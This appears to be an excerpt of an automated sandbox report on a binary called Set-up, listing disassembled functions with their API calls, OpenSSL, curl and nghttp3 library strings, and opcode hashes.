Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert$memcpy
String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
API String ID: 3718630003-2514804127
Opcode ID: 635258d80873b1acd48f43e8907956cd31b61c7648dd4c34ac2db1360cefb6f0
Instruction ID: cd8ad100debc160f89376e9497524d95b7fb6c016d63080bba3234bbfe38e400
Opcode Fuzzy Hash: 635258d80873b1acd48f43e8907956cd31b61c7648dd4c34ac2db1360cefb6f0
Instruction Fuzzy Hash: 6441CF71104304DFEB04DF15CD84F5A7BA4FF55309F1A049DE4899BAA2D731E849CB62

Function 00A42370 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00A4238F
CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00A423C4
GetLastError.KERNEL32 ref: 00A42433

Part of subcall function 00A42240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00A3F763,?,?,?,?,?), ref: 00A42251
Part of subcall function 00A42240: WideCharToMultiByte.KERNEL32 ref: 00A42284
Part of subcall function 00A42240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00A422BD

Strings

ERR_CAPI_error, xrefs: 00A423F9
engines/e_capi.c, xrefs: 00A423A4, 00A42426, 00A42466
Error code= 0x, xrefs: 00A4244F
%lX, xrefs: 00A4243E
capi_cert_get_fname, xrefs: 00A42379
engines/e_capi_err.c, xrefs: 00A42400

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
API String ID: 3049598375-4146664032
Opcode ID: 21e22f69f968a1d1c32735fe8707849d4642fd56530a96e0ed40ef694a8cfe47
Instruction ID: a5fad947ea96fc91e7511c9779d8ff8adcbe7bcf7689ab3d56873be8c376cf8d
Opcode Fuzzy Hash: 21e22f69f968a1d1c32735fe8707849d4642fd56530a96e0ed40ef694a8cfe47
Instruction Fuzzy Hash: F921AE69B803007FE6203BA5BC57F3B3A5CCBC5B06F004134FA08692D3E6959A1C87B2

Function 009E4960 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 381COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 009E49A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 009E4D44
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?), ref: 009E4E33

Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8

Strings

Prompt info data type incorrect, xrefs: 009E4BC7
ossl_pw_get_passphrase, xrefs: 009E4B8D, 009E4BB0, 009E4C24
No password method specified, xrefs: 009E4BA4
pass phrase, xrefs: 009E4A9C
crypto/passphrase.c, xrefs: 009E4AC8, 009E4B15, 009E4B65, 009E4B97, 009E4BBA, 009E4BF6, 009E4C2E, 009E4C53, 009E4C9C, 009E4CF7, 009E4D62, 009E4D8E, 009E4DA2, 009E4DB9, 009E4E13, 009E4E70
info, xrefs: 009E49DE
do_ui_passphrase, xrefs: 009E4B5B, 009E4BEC, 009E4C49, 009E4C92, 009E4CED, 009E4D19, 009E4D58, 009E4E69

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy$strcpystrlen
String ID: No password method specified$Prompt info data type incorrect$crypto/passphrase.c$do_ui_passphrase$info$ossl_pw_get_passphrase$pass phrase
API String ID: 699153967-1272933286
Opcode ID: 3394414f7959c47634ef1efc587f07baf4fe3ba6bb794de4a3b2e95f1f3c693f
Instruction ID: 078ede222c3aa990e0284ce473f28ff177f80c797999ac2aefecf5844a79723d
Opcode Fuzzy Hash: 3394414f7959c47634ef1efc587f07baf4fe3ba6bb794de4a3b2e95f1f3c693f
Instruction Fuzzy Hash: 97C13B78B483817FD7217F619D43F6BB698AFD0B04F084928FA44962C3E675EC548663

Function 008648F0 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 349COMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0086491A
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0086497C
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 008649F1
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864ABB
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864B21
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864BCF
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864C33
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864CDD
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00864D30

Strings

0123456789, xrefs: 0086490D, 00864915, 00864977, 008649A2, 008649EC, 00864A0D, 00864AB6, 00864AE1, 00864B1C, 00864B3D, 00864BCA, 00864BF3, 00864C2E, 00864C4F, 00864CD8, 00864CF8, 00864D20, 00864D2B

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memchr
String ID: 0123456789
API String ID: 3297308162-2793719750
Opcode ID: a2a9c148b684350ae81e406980294198dbed0bc19dfd0e6758db5b552fa39d65
Instruction ID: 4f0b58803e0913f8be451fc55b459867e4812a44af674449eeea32f74596b012
Opcode Fuzzy Hash: a2a9c148b684350ae81e406980294198dbed0bc19dfd0e6758db5b552fa39d65
Instruction Fuzzy Hash: C9B128611883A25BDB229A2484A0B7E7FC5EF53744F1E50ADDDC4CB3D3DA668E09C312

Function 0096A1B0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 174stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009DB4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB4CA
Part of subcall function 009DB4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB4D4
Part of subcall function 009DB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,009E7667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB53B
Part of subcall function 009DB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,009E7667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB5A1
Part of subcall function 009DB4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB5B4
Part of subcall function 009DB4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB648
Part of subcall function 009DB4B0: WideCharToMultiByte.KERNEL32 ref: 009DB67F

Part of subcall function 009DB4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(009E7667,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB504

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0096A1F0
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0096A20B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 0096A25D

Strings

_%s.sqlog, xrefs: 0096A2F0
OSSL_QFILTER, xrefs: 0096A1CA
QLOGDIR, xrefs: 0096A1BB
client, xrefs: 0096A2E2
ssl/quic/qlog.c, xrefs: 0096A23E, 0096A375, 0096A38C
%02x, xrefs: 0096A29F
server, xrefs: 0096A2E7, 0096A2EF

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
API String ID: 2744062652-2540125403
Opcode ID: d799886ae02b8f96536518cdf3d5e5834a3c4b6083d6cd4c1e83f839c681d6a6
Instruction ID: 400d18acc32df83eb0bb2ef0a39a31b0a24b2a633061e7c0f00a4c05959af09a
Opcode Fuzzy Hash: d799886ae02b8f96536518cdf3d5e5834a3c4b6083d6cd4c1e83f839c681d6a6
Instruction Fuzzy Hash: F45126E5A443446FE710BA24AC52B3B76D89FD0744F084438F889A7343FA65EC04DBA3

Function 008227E0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 299stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0082284C

Strings

Alt-svc connecting from [%s]%s:%d to [%s]%s:%d, xrefs: 00822DA3
url.c, xrefs: 00822863, 008228B0, 00822CF9, 00822DDE
Please URL encode %% as %%25, see RFC 6874., xrefs: 008229E3
No valid port number in connect to host string (%s), xrefs: 00822C4B
%s%s%s, xrefs: 00822834

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
API String ID: 39653677-4104037097
Opcode ID: 6c16494e7785280386a230ed311f19d5e3490245743342b989a11156bfbce49e
Instruction ID: 8a89af3469dddfc5027104793d65a128dacb5c9d3920bdfd99dc361daa158e5b
Opcode Fuzzy Hash: 6c16494e7785280386a230ed311f19d5e3490245743342b989a11156bfbce49e
Instruction Fuzzy Hash: 2CA122706043647FEB249E18E845B7A7BD5FF81354F08447DE88ACB292E7329D91C792

Function 0083A260 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,00000080), ref: 0083A376
WSAGetLastError.WS2_32 ref: 0083A380

Part of subcall function 008078B0: closesocket.WS2_32(?), ref: 008078BB

Part of subcall function 0083EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 0083EF6F

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A3D2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A3D6

Strings

ssrem inet_ntop() failed with errno %d: %s, xrefs: 0083A3F4
cf-socket.c, xrefs: 0083A2E9
accepted_set(sock=%d, remote=%s port=%d), xrefs: 0083A488
getpeername() failed with errno %d: %s, xrefs: 0083A3A0

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _errno$ErrorLastclosesocketgetpeername
String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1501154218-2965463112
Opcode ID: 6e0f4115130adc0fd3bb74422b4484787028ccf64756d1be20f18ac7ecf81fb7
Instruction ID: 9e7f48a76e8fd4b52d1a39532647108f6cd97e44984c86b58767d7d298592e51
Opcode Fuzzy Hash: 6e0f4115130adc0fd3bb74422b4484787028ccf64756d1be20f18ac7ecf81fb7
Instruction Fuzzy Hash: 5151E571904744ABEB259F28CC45BE777A8FF81314F044528F99C97252EB32A989CBD3

Function 008AA5A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 008AA5FC
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 008AA698
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 008AA6BF
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 008AA6EB
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 008AA700

Strings

lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK, xrefs: 008AA6FB
i + 1 < blk->n, xrefs: 008AA6E6
nghttp3_ksl.c, xrefs: 008AA6E1, 008AA6F6

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assertmemcpy$memmove
String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
API String ID: 3463011695-2629231663
Opcode ID: 1f327af8a6d63d76070bd5d8ac22a656fc073e16572aa7ebfe13f44228178c6b
Instruction ID: 8a52f859e7a934ca39a6e0d4ac50f57b16deb86a9896ee871210068de2f2be81
Opcode Fuzzy Hash: 1f327af8a6d63d76070bd5d8ac22a656fc073e16572aa7ebfe13f44228178c6b
Instruction Fuzzy Hash: 7241A0766043049FD708EF18D88196AB7E6FF99314F18C96DE8898B752E770ED01CB51

Function 00A42480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00A42491
CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00A424C6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00A3F5B4), ref: 00A42529

Strings

ERR_CAPI_error, xrefs: 00A424EF
engines/e_capi.c, xrefs: 00A424A6, 00A4251C, 00A42559
Error code= 0x, xrefs: 00A42545
%lX, xrefs: 00A42534
engines/e_capi_err.c, xrefs: 00A424F6

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: CertCertificateContextProperty$ErrorLast
String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
API String ID: 2217977984-837018288
Opcode ID: 001a0a601ebea93f8dc14706aa8d818fe0eb94f49c8c103d306d955e6d41a0da
Instruction ID: 1144e8768603eb965e2cdacd1de84d0f84c8728953d8b7577b67aa6297a6c92a
Opcode Fuzzy Hash: 001a0a601ebea93f8dc14706aa8d818fe0eb94f49c8c103d306d955e6d41a0da
Instruction Fuzzy Hash: DD1190A9B843047FE22037A5BC47F2B3A5CDBC5B59F404060FA08781C3E695991C8772

Function 00852430 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00852666
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00852699
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 008526FB
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 0085273A

Strings

:%u, xrefs: 008526CC
Shuffling %i addresses, xrefs: 008524A6
hostip.c, xrefs: 008524B4, 0085253F, 00852613, 00852626, 00852673, 0085276D, 008527AF

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: :%u$Shuffling %i addresses$hostip.c
API String ID: 2198566249-1766712111
Opcode ID: 0a3c208b0c389b464af9114a091224d121d4ed085d37d2fe754b11d002eead11
Instruction ID: 50886217a14862055926eed015ec2a375b8ead34bf62fa9bd83a1f27b5cce86f
Opcode Fuzzy Hash: 0a3c208b0c389b464af9114a091224d121d4ed085d37d2fe754b11d002eead11
Instruction Fuzzy Hash: B9A1CF75A047049BD724DF18C845B6AB7E5FF99304F58442DEE8AC7382EB31E9198B82

Function 00B86940 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

